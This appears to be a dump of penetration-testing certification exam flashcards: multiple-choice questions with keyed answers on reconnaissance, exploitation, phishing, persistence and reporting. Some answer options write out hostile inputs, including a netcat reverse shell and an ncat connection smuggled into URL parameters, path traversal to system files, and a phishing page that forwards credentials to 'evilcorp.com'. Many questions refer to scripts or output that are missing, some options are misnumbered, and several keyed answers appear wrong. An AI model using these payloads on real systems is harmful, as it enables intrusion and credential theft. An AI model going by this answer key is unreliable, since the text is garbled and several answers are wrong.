Dump 3 Flashcards
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a
shell. However, a connection was not established, and no errors were shown on the payload
execution. The penetration tester suspected that a network device, like an IPS or next-generation
firewall, was dropping the connection. Which of the following payloads are MOST likely to
establish a shell successfully?
A.
windows/x64/meterpreter/reverse_tcp
B.
windows/x64/meterpreter/reverse_http
C.
windows/x64/shell_reverse_tcp
D.
windows/x64/powershell_reverse_tcp
E.
windows/x64/meterpreter/reverse_https
Answer: E
A penetration tester has been hired to examine a website for flaws. During one of the time
windows for testing, a network engineer notices a flood of GET requests to the web server,
reducing the website’s response time by 80%. The network engineer contacts the penetration
tester to determine if these GET requests are part of the test. Which of the following BEST
describes the purpose of checking with the penetration tester?
A.
Situational awareness
B.
Rescheduling
C.
DDoS defense
D.
Deconfliction
Answer: D
Which of the following is the BEST resource for obtaining payloads against specific network
infrastructure products?
A.
Exploit-DB
B.
Metasploit
C.
Shodan
D.
Retina
Answer: A
A penetration tester gives the following command to a systems administrator to execute on one of
the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?
A.
To trick the systems administrator into installing a rootkit
B.
To close down a reverse shell
C.
To remove a web shell after the penetration test
D.
To delete credentials the tester created
Answer: C
The following PowerShell snippet was extracted from a log of an attacker machine:
A penetration tester would like to identify the presence of an array. Which of the following line
numbers would define the array?
A.
Line 8
B.
Line 13
C.
Line 19
D.
Line 20
Answer: B
A company provided the following network scope for a penetration test:
169.137.1.0/24
221.10.1.0/24
149.14.1.0/24
A penetration tester discovered a remote command injection on IP address 149.14.1.24 and
exploited the system. Later, the tester learned that this particular IP address belongs to a third
party. Which of the following stakeholders is responsible for this mistake?
A.
The company that requested the penetration test
B.
The penetration testing company
C.
The target host’s owner
D.
The penetration tester
E.
The subcontractor supporting the test
Answer: A
In an unprotected network file repository, a penetration tester discovers a text file containing
usernames and passwords in cleartext and a spreadsheet containing data for 50 employees,
including full names, roles, and serial numbers. The tester realizes some of the passwords in the
text file follow the format: <name-serial_number>. Which of the following would be the best action
for the tester to take NEXT with this information?</name-serial_number>
A.
Create a custom password dictionary as preparation for password spray testing.
B.
Recommend using a password manager/vault instead of text files to store passwords securely.
C.
Recommend configuring password complexity rules in all the systems and applications.
D.
Create a TPM-backed sealed storage location within which the unprotected file repository can be
reported.
Answer: A
During the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?
A.
Linux
. NetBSD
B.
Windows
C.
macOS
Answer: A
A penetration tester joins the assessment team in the middle of the assessment. The client has
asked the team, both verbally and in the scoping document, not to test the production networks.
However, the new tester is not aware of this request and proceeds to perform exploits in the
production environment. Which of the following would have MOST effectively prevented this
misunderstanding?
A.
Prohibiting exploitation in the production environment
B.
Requiring all testers to review the scoping document carefully
C.
Never assessing the production networks
D.
Prohibiting testers from joining the team during the assessment
Answer: C
A penetration tester is using the following script:
Which of the following BEST describes the purpose of this script?
A.
To determine if a web server’s date/time function is susceptible to attack
B.
To determine if a web server’s time zone has been misconfigured
C.
To determine the difference between local and server time
D.
To determine and display the round-trip time of HTTP requests
Answer: C
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from
the target machine. Which of the following MOST likely caused the attack to fail?
A.
The injection was too slow.
B.
The DNS information was incorrect.
C.
The DNS cache was not refreshed.
D.
The client did not receive a trusted response.
Answer: D
During an assessment, a penetration tester was able to access the organization’s wireless
network from outside of the building using a laptop running Aircrack-ng. Which of the following
should be recommended to the client to remediate this issue?
A.
Changing to Wi-Fi equipment that supports strong encryption
B.
Using directional antennae
C.
Using WEP encryption
D.
Disabling Wi-Fi
Answer: B
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server
that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell.
Enumerating the server for privilege escalation, the tester discovers the following:
Which of the following should the penetration tester do NEXT?
A.
Close the reverse shell the tester is using.
B.
Note this finding for inclusion in the final report.
C.
Investigate the high numbered port connections.
D.
Contact the client immediately.
Answer: C
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN
100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the
penetration tester now wants the local interface of the attacker machine to have a static ARP entry
in the local cache. The attacker machine has the following:
IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33
Which of the following commands would the penetration tester MOST likely use in order to
establish a static ARP entry successfully?
A.
tcpdump -i eth01 arp and arp[6:2] == 2
B.
arp -s 192.168.1.63 60-36-DD-A6-C5-33
C.
ipconfig /all findstr /v 00-00-00 | findstr Physical
D.
route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1
Answer: B
During an internal penetration test against a company, a penetration tester was able to navigate to
another part of the network and locate a folder containing customer information such as
addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following
should the company have implemented to BEST protect this data?
A.
Vulnerability scanning
B.
Network segmentation
C.
System hardening
D.
Intrusion detection
Answer: B
A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the
following commands would be the BEST option when stealth is not a concern and the task is time
sensitive?
A.
Nmap -s 445 -Pn -T5 172.21.0.0/16
B.
Nmap -p 445 -n -T4 -open 172.21.0.0/16
. Nmap -sV –script=smb* 172.21.0.0/16
C.
Nmap -p 445 -max -sT 172. 21.0.0/16
Answer: B
Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the
following tools would be BEST to use to analyze this issue?
A.
Peach
B.
WinDbg
C.
GDB
D.
OllyDbg
Answer: C
A penetration tester found several critical SQL injection vulnerabilities during an assessment of a
client’s system. The tester would like to suggest mitigation to the client as soon as possible.
Which of the following remediation techniques would be the BEST to recommend? (Choose two.)
A.
Closing open services
B.
Encryption users’ passwords
C.
Randomizing users’ credentials
D.
Users’ input validation
E.
Parameterized queries
F.
Output encoding
Answer: D,E
Which of the following is a rules engine for managing public cloud accounts and resources?
A.
Cloud Custodian
B.
Cloud Brute
C.
Pacu
D.
Scout Suite
Answer: A
A penetration tester will be performing a vulnerability scan as part of the penetration test on a
client’s website. The tester plans to run several Nmap scripts that probe for vulnerabilities while
avoiding detection. Which of the following Nmap options will the penetration tester MOST likely
utilize?
A.
-8 -T0
B.
–script “httpvuln”
C.
-sn
D.
-O -A
Answer: B
A penetration tester discovered that a client uses cloud mail as the company’s email system.
During the penetration test, the tester set up a fake cloud mail login page and sent all company
employees an email that stated their inboxes were full and directed them to the fake login page to
remedy the issue. Which of the following BEST describes this attack?
A.
Credential harvesting
B.
Privilege escalation
C.
Password spraying
D.
Domain record abuse
Answer: A
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the
target company’s website and then creates a list of possible usernames based on the email
address format. Which of the following types of attacks would MOST likely be used to avoid
account lockout?
A.
Mask
B.
Rainbow
C.
Dictionary
D.
Password spraying
Answer: D
Which of the following is the activity that is typically required the MOST during the postengagement
cleanup phase?
A.
Removing shells
B.
Launching new attacks
C.
Documenting vulnerabilities
D.
Requesting payment
Answer: A
Which of the following tools should a penetration tester use to crawl a website and build a wordlist
using the data recovered to crack the password on the website?
A.
DirBuster
B.
CeWL
C.
w3af
D.
Patator
Answer: B
A penetration tester examines a web-based shopping catalog and discovers the following URL
when viewing a product in the catalog:
http://company.com/catalog.asp?productid=22
The penetration tester alters the URL in the browser to the following and notices a delay when the
page refreshes:
http://company.com/catalog.asp?productid=22;WAITFOR DELAY’00:00:05’
Which of the following should the penetration tester attempt NEXT?
A.
http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell ‘whoami’
B.
http://company.com/catalog.asp?productid=22’ OR 1=1 –
C.
http://company.com/catalog.asp?productid=22’ UNION SELECT 1,2,3 –
D.
http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
Answer: B
The output from a penetration testing tool shows 100 hosts contained findings due to improper
patch management. Which of the following did the penetration tester perform?
A.
A vulnerability scan
B.
A WHOIS lookup
C.
A packet capture
D.
An Nmap scan
Answer: D
After running the enum4linux.pl command, a penetration tester received the following output:
Which of the following commands should the penetration tester run NEXT?
A.
smbspool //192.160.100.56/print$
B.
net rpc share -S 192.168.100.56 -U ‘’
C.
smbget //192.168.100.56/web -U ‘’
D.
smbclient //192.168.100.56/web -U ‘’ -N
Answer: D
During an assessment, a penetration tester gathered OSINT for one of the IT systems
administrators from the target company and managed to obtain valuable information, including
corporate email addresses. Which of the following techniques should the penetration tester
perform NEXT?
A.
Badge cloning
B.
Watering-hole attack
C.
Impersonation
D.
Spear phishing
Answer: D
Which of the following compliance requirements would be BEST suited in an environment that
processes credit card data?
A.
PCI DSS
B.
ISO 27001
C.
SOX
D.
GDPR
Answer: A
A penetration tester successfully infiltrated the targeted web server and created credentials with
administrative privileges. After conducting data exfiltration, which of the following should be the
tester’s NEXT step?
A.
Determine what data is available on the web server.
B.
Change or delete the logs.
C.
Log out and migrate to a new session.
D.
Log in as the new user.
Answer: D
A penetration tester analyzed a web-application log file and discovered an input that was sent to
the company’s web application. The input contains a string that says “WAITFOR.” Which of the
following attacks is being attempted?
A.
SQL injection
B.
HTML injection
C.
Remote command injection
D.
DLL injection
Answer: C
Given the following code:
Which of the following data structures is systems?
A.
A tuple
B.
A tree
C.
An array
D.
A dictionary
Answer: D
A penetration tester who is performing an engagement notices a specific host is vulnerable to
EternalBlue. Which of the following would BEST protect against this vulnerability?
A.
Network segmentation
B.
Key rotation
C.
Encrypted passwords
D.
Patch management
Answer: D
The delivery of a penetration test within an organization requires defining specific parameters
regarding the nature and types of exercises that can be conducted and when they can be
conducted. Which of the following BEST identifies this concept?
A.
Statement of work
B.
Program scope
C.
Non-disclosure agreement
D.
Rules of engagement
Answer: D
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of
the following should the tester perform NEXT to pass the hash and provide persistence with the
newly acquired credentials?
A.
Use Patator to pass the hash and Responder for persistence.
B.
Use Hashcat to pass the hash and Empire for persistence.
C.
Use a bind shell to pass the hash and WMI for persistence.
D.
Use Mimikatz to pass the hash and PsExec for persistence.
Answer: D
The provision that defines the level of responsibility between the penetration tester and the client
for preventing unauthorized disclosure is found in the:
A.
NDA
B.
SLA
C.
MSA
D.
SOW
Answer: A
A penetration tester created the following script to use in an engagement:
Which of the following is the reason for the error?
A.
The sys variable was not defined.
B.
The argv variable was not defined.
C.
The sys module was not imported.
D.
The argv module was not imported.
Answer: C
A penetration tester was able to compromise a web server and move laterally into a Linux web
server. The tester now wants to determine the identity of the last user who signed in to the web
server. Which of the following log files will show this activity?
A.
/var/log/messages
B.
/var/log/last_user
C.
/var/log/user_log
D.
/var/log/lastlog
Answer: D
A penetration tester is conducting an engagement against an internet-facing web application and
planning a phishing campaign. Which of the following is the BEST passive method of obtaining the
technical contacts for the website?
A.
WHOIS domain lookup
B.
Job listing and recruitment ads
C.
SSL certificate information
D.
Public data breach dumps
Answer: A
Which of the following tools would BEST allow a penetration tester to capture wireless
handshakes to reveal a Wi-Fi password from a Windows machine?
A.
Wireshark
B.
EAPHammer
C.
Kismet
D.
Aircrack-ng
Answer: D
A security analyst needs to perform an on-path attack on BLE smart devices. Which of the
following tools would be BEST suited to accomplish this task?
A.
Wireshark
B.
Gattacker
C.
tcpdump
D.
Netcat
Answer: B
During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the
web log for a target Apache server. Which of the following steps would the penetration tester most
likely try NEXT to further exploit the web server? (Choose two.)
A.
Cross-site scripting
B.
Server-side request forgery
C.
SQL injection
D.
Log poisoning
E.
Cross-site request forgery
F.
Command injection
Answer: D,F
A penetration tester opened a reverse shell on a Linux web server and successfully escalated
privileges to root. During the engagement, the tester noticed that another user logged in frequently
as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the
BEST option for the penetration tester to maintain root-level persistence on this server during the
test?
A.
Add a web shell to the root of the website.
B.
Upgrade the reverse shell to a true TTY terminal.
C.
Add a new user with ID 0 to the /etc/passwd file.
D.
Change the password of the root user and revert after the test.
Answer: C
A company requires that all hypervisors have the latest available patches installed. Which of the
following would BEST explain the reason why this policy is in place?
A.
To provide protection against host OS vulnerabilities
B.
To reduce the probability of a VM escape attack
C.
To fix any misconfigurations of the hypervisor
D.
To enable all features of the hypervisor
Answer: A
A penetration tester uncovers access keys within an organization’s source code management
solution. Which of the following would BEST address the issue? (Choose two.)
A.
Setting up a secret management solution for all items in the source code management system
B.
Implementing role-based access control on the source code management system
C.
Configuring multifactor authentication on the source code management system
D.
Leveraging a solution to scan for other similar instances in the source code management system
E.
Developing a secure software development life cycle process for committing code to the source
F.
Creating a trigger that will prevent developers from including passwords in the source code
management system
Answer: A,D
A penetration tester is conducting an assessment against a group of publicly available web
servers and notices a number of TCP resets returning from one of the web servers. Which of the
following is MOST likely causing the TCP resets to occur during the assessment?
A.
The web server is using a WAF.
B.
The web server is behind a load balancer.
C.
The web server is redirecting the requests.
D.
The local antivirus on the web server is rejecting the connection.
Answer: A
An assessment has been completed, and all reports and evidence have been turned over to the
client. Which of the following should be done NEXT to ensure the confidentiality of the client’s
information?
A.
Follow the established data retention and destruction process.
B.
Report any findings to regulatory oversight groups.
C.
Publish the findings after the client reviews the report.
D.
Encrypt and store any client information for future analysis.
Answer: A
A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false
positives and increases the true positives of the results. Which of the following would MOST likely
accomplish this goal?
A.
Using OpenVAS in default mode
B.
Using Nessus with credentials
C.
Using Nmap as the root user
D.
Using OWASP ZAP
Answer: B
A client evaluating a penetration testing company requests examples of its work. Which of the
following represents the BEST course of action for the penetration testers?
A.
Redact identifying information and provide a previous customer’s documentation.
B.
Allow the client to only view the information while in secure spaces.
C.
Determine which reports are no longer under a period of confidentiality.
D.
Provide raw output from penetration testing tools.
Answer: C
For a penetration test engagement, a security engineer decides to impersonate the IT help desk.
The security engineer sends a phishing email containing an urgent request for users to change
their passwords and a link to https://example.com/index.html. The engineer has designed the
attack so that once the users enter the credentials, the index.html page takes the credentials and
then forwards them to another server that the security engineer is controlling. Given the following
information:
Which of the following lines of code should the security engineer add to make the attack
successful?
A.
window.location.= ‘https://evilcorp.com’
B.
crossDomain: true
C.
geturlparameter (‘username’)
D.
redirectUrl = ‘https://example.com’
Answer: B
Which of the following BEST explains why a penetration tester cannot scan a server that was
previously scanned successfully?
A.
The IP address is wrong.
B.
The server is unreachable.
C.
The IP address is on the blocklist.
D.
The IP address is on the allow list.
Answer: C
An exploit developer is coding a script that submits a very large number of small requests to a web
server until the server is compromised. The script must examine each response received and
compare the data to a large number of strings to determine which data to submit next. Which of
the following data structures should the exploit developer use to make the string comparison and
determination as efficient as possible?
A.
A list
B.
A tree
C.
A dictionary
D.
An array
Answer: C
A penetration tester uncovered a flaw in an online banking web application that allows arbitrary
requests to other internal network assets through a server-side request forgery. Which of the
following would BEST reduce the risk of attack?
A.
Implement multifactor authentication on the web application to prevent unauthorized access of the
application.
B.
Configure a secret management solution to ensure attackers are not able to gain access to
confidential information.
C.
Ensure a patch management system is in place to ensure the web server system is hardened.
D.
Sanitize and validate all input within the web application to prevent internal resources from being
accessed.
E.
Ensure that enhanced logging is enabled on the web application to detect the attack.
Answer: D
Which of the following actions would BEST explain why a testing team would need to reach out to
a customer’s emergency contact during an assessment?
A.
To confirm assessment dates
B.
To escalate the detection of a prior compromise
C.
To submit the weekly status report
D.
To announce that testing will begin
Answer: B
An executive needs to use Wi-Fi to connect to the company’s server while traveling. Looking for
available Wi-Fi connections, the executive notices an available access point to a hotel chain that is
not available where the executive is staying. Which of the following attacks is the executive MOST
likely experiencing?
A.
Data modification
B.
Amplification
C.
Captive portal
D.
Evil twin
Answer: D
A penetration tester calls an IT employee and pretends to be the financial director of the company.
The penetration tester asks the IT employee to reset the financial director’s email password. The
penetration tester claims to be at an ongoing, off-site meeting with some investors and needs a
presentation file quickly downloaded from the director’s mailbox. Which of following techniques is
the penetration tester trying to utilize? (Choose two.)
A.
Scarcity
B.
Intimidation
C.
Authority
D.
Consensus
E.
Urgency
F.
Familiarity
Answer: C,E
A penetration tester runs the following command:
dig @ dns01.comptia.local axfr comptia.local
If successful, which of the following types of information would be provided?
A.
The DNSSEC certificate and CA
B.
The DHCP scopes and ranges used on the network
C.
The hostnames and IP addresses of internal systems
D.
The OS and version of the DNS server
Answer: C
A company recruited a penetration tester to configure intrusion detection over the wireless
network. Which of the following tools would BEST resolve this issue?
A.
Aircrack-ng
B.
Wireshark
C.
Cowpatty
D.
Kismet
Answer: D
While performing an assessment on a web application, a penetration tester notices the web
browser creates the following request when clicking on the stock status for an item:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.shop.com:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
Which of the following types of attacks would the penetration tester most likely try NEXT?
A.
Cross-site scripting
B.
Command injection
C.
Local file inclusion
D.
Server-side request forgery
Answer: D
When accessing the URL http://192.168.0.1/validate/user.php, a penetration tester obtained the
following output:
Which of the following is the MOST probable cause for this output?
A.
Lack of code signing
B.
Incorrect command syntax
C.
Insufficient error handling
D.
Insecure data transmission
Answer: C
Which of the following is the MOST secure method for sending the penetration test report to the
client?
A.
Host it on an online storage system.
B.
Put it inside a password-protected ZIP file.
C.
Transfer it via webmail using an HTTPS connection.
D.
Use the client’s public key.
Answer: D
During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using
custom NSE scripts stored in the following folder:
/home/user/scripts
Which of the following commands should the penetration tester use to perform this scan?
A.
nmap –resume “not intrusive”
B.
nmap –script default,safe
C.
nmap –script /home/user/scripts
D.
nmap –load /home/user/scripts
Answer: C
Within a Python script, a line that states print (var) outputs the following:
[{‘1’ : ‘CentOS’, ‘2’ : ‘Ubuntu’}, {‘1’ : ‘Windows 10’, ‘2’ : ‘Windows Server 2016’}]
Which of the following objects or data structures is var?
A.
An array
B.
A class
C.
A dictionary
D.
A list
Answer: D
A penetration tester wrote the following comment in the final report: “Eighty-five percent of the
systems tested were found to be prone to unauthorized access from the internet.”
Which of the following audiences was this message intended?
A.
Systems administrators
B.
C-suite executives
C.
Data privacy ombudsman
D.
Regulatory officials
Answer: B
During a code review assessment, a penetration tester finds the following vulnerable code inside
one of the web application files:
<% String id = request.getParameter(“id”); %>
Employee ID: <%= id %>
Which of the following is the BEST remediation to prevent a vulnerability from being exploited,
based on this code?
A.
Parameterized queries
B.
Patch application
C.
Output encoding
D.
HTML sanitization
Answer: C
Which of the following best describes why a client would hold a lessons-learned meeting with the
penetration-testing team?
A.
To provide feedback on the report structure and recommend improvements
B.
To discuss the findings and dispute any false positives
C.
To determine any processes that failed to meet expectations during the assessment
D.
To ensure the penetration-testing team destroys all company data that was gathered during the
test
Answer: C
A penetration tester is performing reconnaissance for a web application assessment. Upon
investigation, the tester reviews the robots.txt file for items of interest.
INSTRUCTIONS
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for
removal.
The tool the penetration tester should use for the further investigation is WPScan
The two entries in the robots.txt file that the penetration tester should recommend for removal
are 14 Allow: /admin 15 Allow: /wp-admin
Which of the following factors would a penetration tester MOST likely consider when testing at a
location?
A.
Determine if visas are required.
B.
Ensure all testers can access all sites.
C.
Verify the tools being used are legal for use at all sites.
D.
Establish the time of the day when a test can occur.
Answer: D
A penetration tester who is performing a physical assessment has achieved physical access to a
call center for the assessed company. The tester is able to move freely around the room.
Which of the following attack types is most likely to result in the tester obtaining personal or
confidential information quickly?
A.
Dumpster diving
B.
Warwalking
C.
Vishing
D.
Smishing
E.
Shoulder surfing
Answer: E
In the process of active service enumeration, a penetration tester identifies an SMTP daemon
running on one of the target company’s servers.
Which of the following actions would best enable the tester to perform phishing in a later stage of
the assessment?
A.
Test for RFC-defined protocol conformance.
B.
Attempt to brute force authentication to the service.
C.
Perform a reverse DNS query and match to the service banner.
D.
Check for an open relay configuration.
Answer: D
A company recently moved its software development architecture from VMs to containers. The
company has asked a penetration tester to determine if the new containers are configured
correctly against a DDoS attack.
Which of the following should a tester perform FIRST?
A.
Check the strength of the encryption settings.
B.
Determine if security tokens are easily available.
C.
Run a vulnerability check against the hypervisor.
D.
Scan the containers for open ports.
Answer: D
Given the following script:
Which of the following describes True?
A.
A while loop
B.
A conditional
C.
A Boolean operator
D.
An arithmetic operator
Answer: B
A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst
wants to limit observation of the penetration tester’s activities and lower the probability of detection
by intrusion protection and detection systems.
Which of the following Nmap commands should the analyst use to achieve this objective?
A.
nmap -F 192.168.5.5
B.
nmap -datalength 2 192.168.5.5
C.
nmap -D 0.5.2.2 192.168.5.5
D.
nmap -scanflags SYNFIN 192.168.5.5
Answer: D
A penetration tester is validating whether input validation mechanisms have been implemented in
a web application.
Which of the following should the tester use to determine whether the application is vulnerable to
path traversal attacks?
A.
GET /image?filename-..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
B.
GET /image?filename=lefitfe;pwd
C.
POST /image?filename -<meta http-equiv—”Refresh? content-“0;url-‘https://www.comptia.org’” />
D.
POST /image?filename =yhtak;ncat –ssl 192.168.0.1 2222
Answer: A
A penetration tester learned that when users request password resets, help desk analysts change
users’ passwords to 123change. The penetration tester decides to brute force an internet-facing
webmail to check which users are still using the temporary password. The tester configures the
brute-force tool to test usernames found on a text file and the password 123change.
Which of the following techniques is the penetration tester using?
A.
Brute-force attack
B.
LDAP injection
C.
Password spraying
D.
Kerberoasting
Answer: C
A penetration tester is conducting an unknown environment test and gathering additional
information that can be used for later stages of an assessment.
Which of the following would most likely produce useful information for additional testing?
A.
Public code repositories associated with a developer who previously worked for the target
company
B.
Public code repositories associated with the target company’s organization
C.
Private code repositories associated with the target company’s organization
D.
Private code repositories associated with a developer who previously worked for the target
company
Answer: B
Which of the following is a regulatory compliance standard that focuses on user privacy by
implementing the right to be forgotten?
A.
NIST SP 800-53
B.
ISO 27001
C.
PCI DSS
D.
GDPR
Answer: D
A penetration tester developed the following script to be used during an engagement:
However, when the penetration tester ran the script, the tester received the following message:
socket.gaierror: [Errno -2] Name or service not known
Which of the following changes should the penetration tester implement to fix the script?
Answer: A
A penetration tester who was exclusively authorized to conduct a physical assessment noticed
there were no cameras pointed at the dumpster for the target company. The penetration tester
returned at night and collected garbage that contained receipts for recently purchased networking
equipment. The models of equipment purchased are vulnerable to attack.
Which of the following is the most likely NEXT step for the penetration tester?
A.
Alert the target company of the discovered information.
B.
Verify the discovered information is correct with the manufacturer.
C.
Scan the equipment and verify the findings.
D.
Return to the dumpster for more information.
Answer: A
A penetration tester is attempting to get more people from a target company to download and run
an executable. Which of the following would be the MOST effective way for the tester to achieve
this objective?
A.
Dropping USB flash drives around the company campus with the file on it
B.
Attaching the file in a phishing SMS that warns users to execute the file or they will be locked out
of their accounts
C.
Sending a pretext email from the IT department before sending the download instructions later
D.
Saving the file in a common folder with a name that encourages people to click it
Answer: C
Which of the following documents describes activities that are prohibited during a scheduled
penetration test?
A.
MSA
B.
NDA
C.
ROE
D.
SLA
Answer: C
While performing the scanning phase of a penetration test, the penetration tester runs the
following command:
nmap -n -vv -sV -p- 10.10.10.23-28
After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of
the following options should the penetration tester try NEXT?
A.
-sU
B.
-Pn
C.
-sn
D.
-sS
Answer: B
A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the
following tools will the tester MOST likely utilize?
A.
Wireshark
B.
Netcat
C.
Nmap
D.
Ettercap
Answer: D
A penetration tester executes the following Nmap command and obtains the following output:
Which of the following commands would BEST help the penetration tester discover an exploitable
service?
A.
nmap -v -p 25 –script smtp-enum-users remotehost
B.
nmap -v –script=mysql-info.nse remotehost
C.
nmap –script=smb-brute.nse remotehost
D.
nmap -p 3306 –script “httpvuln” remotehost
Answer: A
During enumeration, a red team discovered that an external web server was frequented by
employees. After compromising the server, which of the following attacks would BEST support
compromising company systems?
A.
A side-channel attack
B.
A command injection attack
C.
A watering-hole attack
D.
A cross-site scripting attack
Answer: C
A penetration tester is developing exploits to attack multiple versions of a common software
package. The versions have different menus and features, but they have a common log-in screen
that the exploit must use. The penetration tester develops code to perform the log-in that can be
used by each of the exploits targeted to a specific version.
Which of the following terms is used to describe this common log-in code example?
A.
Conditional
B.
Library
C.
Dictionary
D.
Subapplication
Answer: B
Which of the following tools would be BEST suited to perform a cloud security assessment?
A.
OpenVAS
B.
Scout Suite
C.
Nmap
D.
ZAP
E.
Nessus
Answer: B
During the assessment of a client’s cloud and on-premises environments, a penetration tester was
able to gain ownership of a storage object within the cloud environment using the provided onpremises
credentials.
Which of the following BEST describes why the tester was able to gain access?
A.
Federation misconfiguration of the container
B.
Key mismanagement between the environments
C.
IaaS failure at the provider
D.
Container listed in the public domain
Answer: A
A penetration tester wrote the following script on a compromised system:
Which of the following would explain using this script instead of another tool?
A.
The typical tools could not be used against Windows systems.
B.
The configuration required the penetration tester to not utilize additional files.
C.
The Bash script will provide more thorough output.
D.
The penetration tester wanted to persist this script to run on reboot.
Answer: B
During an assessment, a penetration tester Inspected a log and found a series of thousands of
requests coming from a single IP address to the same URL. A few of the requests are listed
below:
Which of the following vulnerabilities was the attacker trying to exploit?
A.
Session hijacking
B.
URL manipulation
C.
SQL injection
D.
Insecure direct object reference
Answer: D
During a routine penetration test of a customer’s physical data center, a penetration tester
observes that no changes have been made to the production firewalls in more than five years.
Which of the following is the most appropriate remediation technique to reduce the risk of future
security breaches?
A.
Video surveillance
B.
Biometric controls
C.
Password encryption
D.
SSH key rotation
Answer: D
After compromising a system, a penetration tester wants more information in order to decide what
actions to take next. The tester runs the following commands:
curl http://169.254.169.254/latest
Which of the following attacks is the penetration tester more likely trying to perform?
A.
Metadata service attack
B.
Container escape techniques
C.
Credential harvesting
D.
Resource exhaustion
Answer: A
During a vulnerability scan a penetration tester enters the following Nmap command against all of
the non-Windows clients:
nmap –sX –T4 –p 21-25, 67, 80, 139, 8080 192.168.11.191
The penetration tester reviews the packet capture in Wireshark and notices that the target
responds with an RST packet flag set for all of the targeted ports. Which of the following does this
information most likely indicate?
A.
All of the ports in the target range are closed.
B.
Nmap needs more time to scan the ports in the target range.
C.
The ports in the target range cannot be scanned because they are common UDP ports.
D.
All of the ports in the target range are open.
Answer: A
In Java and C/C++, variable initialization is critical because:
A.
the unknown value, when used later, will cause unexpected behavior.
B.
the compiler will assign null to the variable, which will cause warnings and errors.
C.
the initial state of the variable creates a race condition.
D.
the variable will not have an object type assigned to it.
Answer: A
During a client engagement, a penetration tester runs the following Nmap command and obtains
the following output:
Which of the following should the penetration tester include in the report?
A.
Old, insecure ciphers are in use.
B.
The 3DES algorithm should be deprecated.
C.
2,048-bit symmetric keys are incompatible with MD5.
D.
This server should be upgraded to TLS 1.2.
Answer: A
A penetration tester is reviewing the security of a web application running in an IaaS compute
instance. Which of the following payloads should the tester send to get the running process
credentials?
A.
file=http://192.168.1.78?+document.cookie
B.
file=../../../proc/self/environ
C.
file=’%20or%2054365=54365;––
D.
file=http://169.254.169.254/latest/meta-data/
Answer: B
A penetration tester gains access to a web server and notices a large number of devices in the
system ARP table. Upon scanning the web server, the tester determines that many of the devices
are user workstations. Which of the following should be included in the recommendations for
remediation?
A.
Start a training program on proper access to the web server.
B.
Build a patch-management program for the web server.
C.
Place the web server in a screened subnet
D.
Implement endpoint protection on the workstations.
Answer: C
In a wireless network assessment, penetration testers would like to discover and gather
information about accessible wireless networks in the target area. Which of the following is the
most suitable method of finding this information?
A.
Token scoping
B.
RFID cloning
C.
Wardriving
D.
WAF detection
E.
Jamming
Answer: C
After performing a web penetration test, a security consultant is ranking the findings by criticality.
Which of the following standards or methodologies would be best for the consultant to use for
reference?
A.
OWASP
B.
MITRE ATT&CK
C.
PTES
D.
NIST
Answer: A
A penetration tester is performing an assessment against a customer’s web application that is
hosted in a major cloud provider’s environment. The penetration tester observes that the majority
of the attacks attempted are being blocked by the organization’s WAF. Which of the following
attacks would be most likely to succeed?
A.
Reflected XSS
B.
Brute-force
C.
DDoS
D.
Direct-to-origin
Answer: D
